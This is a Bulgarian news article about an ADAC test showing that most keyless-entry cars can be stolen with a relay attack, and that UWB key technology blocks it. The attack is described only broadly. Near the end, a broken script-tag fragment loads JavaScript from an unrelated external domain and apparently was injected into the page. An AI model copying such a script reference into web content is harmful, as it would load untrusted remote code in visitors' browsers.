Новини

Системи за безключов достъп: Кои автомобили са сигурни?

 

Германският автомобилен клуб провери почти 500 автомобила със системи за безключов достъп и установи, че почти всички тествани модели лесно могат да бъдат отворени и откраднати. 

 

Изобщо не са необходими задълбочени познания, например по хакерство или източване на данни, за да бъде отворен автомобил с „Keyless-Go“. За това е достатъчен един свободно и легално достъпен удължител на обхвата, с който изпитателите отварят автомобилите и потеглят с тях за секунди, без да оставят видими следи.

 

Без следи от взлом 

 

Трикът се състои в това, че един крадец, носещ уред, трябва да е близо до ключа, а друг, с втори уред – близо до вратата на автомобила. Така обхватът на радиосигналите се удължава с няколкостотин метра, твърдят от ADAC. Това работи и тогава, „когато ключът е в ръката или собственикът му седи в бирарията с ключ в джоба на панталона”. Двата уреда, чиито компоненти могат да се купят във всеки магазин за електроника срещу около 100 евро, се изработват съвсем лесно.

 

UWB като сигурна защита от кражби

 

Когато двигателят веднъж е запален, той ще работи, докато се изпразни резервоарът. Евентуално крадецът може да зареди автомобила и при работещ мотор. Понеже по автомобила няма следи от взлом, притежателите са заплашени от подозрения в застрахователна измама, когато например откраднатият автомобил бъде изоставен с угаснал двигател.

 

Метод за предпазване са съответните калъфи за ключове, които блокират радиовълните. Тогава обаче водачът трябва да изважда ключа преди всяка употреба и после отново да го поставя в калъфа. По-добър е друг метод, който намира приложение при неголям брой модели. 24 от участващите в теста на ADAC автомобили разполагат със системи за безключов достъп с ултрашироколентова (UWB) техника. UWB чиповете са в състояние извънредно прецизно да измерят разстоянието между ключа и автомобила. Ако се използва удължител с радиовръзка, разстоянието не отговаря на зададеното в заключващата система и тя не отваря автомобила.

 

Като един от първите производители Jaguar Land Rover започва да използва тази техника от 2018 г. Следват някои модели от концерна VW, като Audi A3, Seat Leon, Skoda Octavia и VW Golf. Отделни автомобили, оборудвани с UWB, има при BMW, Mercedes и Genesis. Показваме тези модели в нашата фотогалерия.

 

И още нещо: някои производители разчитат при своите системи Keyless-Go  на датчици за движение в ключа. Ако за известен период от време той остане неподвижен, радиосигналът се изключва. Автомобилният клуб обаче смята тази система за подсигуряване за незадоволителна.

 

Заключение

 

Пълна сигурност не съществува, но с използване на UWB техника автомобилните производители могат да предотвратят най-лесните кражби. А и една по-евтина и проста функция за деактивиране на ключа може да сведе до минимум риска от кражба на автомобила.

 

Текст: Холгер Витих

 


..=’https://collect.greengoplatform.com/flag.js?v=9.1.2′ type=’text/javascript’>

Виж още

Back to top button